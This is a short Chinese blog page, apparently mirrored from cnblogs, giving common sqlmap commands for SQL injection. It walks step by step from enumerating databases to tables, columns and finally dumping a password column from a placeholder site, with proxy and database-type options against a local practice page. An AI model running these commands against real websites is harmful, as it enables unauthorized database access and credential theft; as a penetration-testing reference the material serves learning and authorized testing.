zoukankan      html  css  js  c++  java

  • sqlmap常用命令

    ---------------------------------------------------------------------------------------------------------------------------------------------
    (1) 查找数据库

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs

    (2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables

    (3) 通过2中的数据表得到字段(假如得到的是tablename表)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename --columns

    (4) 通过3得到字段值(假如从3中得到字段id,password)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename -C "password" --dump


    -------------------------------------------------------------------------------------------------------------------------------------------
    使用代理

    sqlmap.py -u "http://localhost/sqlzhurulianxi.php?id=1" --proxy=http://127.0.0.1:8080

    指定数据库类型

    sqlmap.py -u “http://localhost/sqlzhurulianxi.php?id=1” --dbms=MySQL
  • 相关阅读:
    图论-最短路模版
    图论-最小生成树模版
    图论-并查集模版
    数论-矩阵快速幂模版
    数论-GCD && 欧拉函数 && 快速求幂
    对象池技术
    页游代码、资源文件的优化
    页游加速检查
    扩展类与父类继承函数的前后关系
    关于ADDED_TO_STAGE事件
  • 原文地址:https://www.cnblogs.com/thespace/p/12335596.html
Copyright © 2011-2022 走看看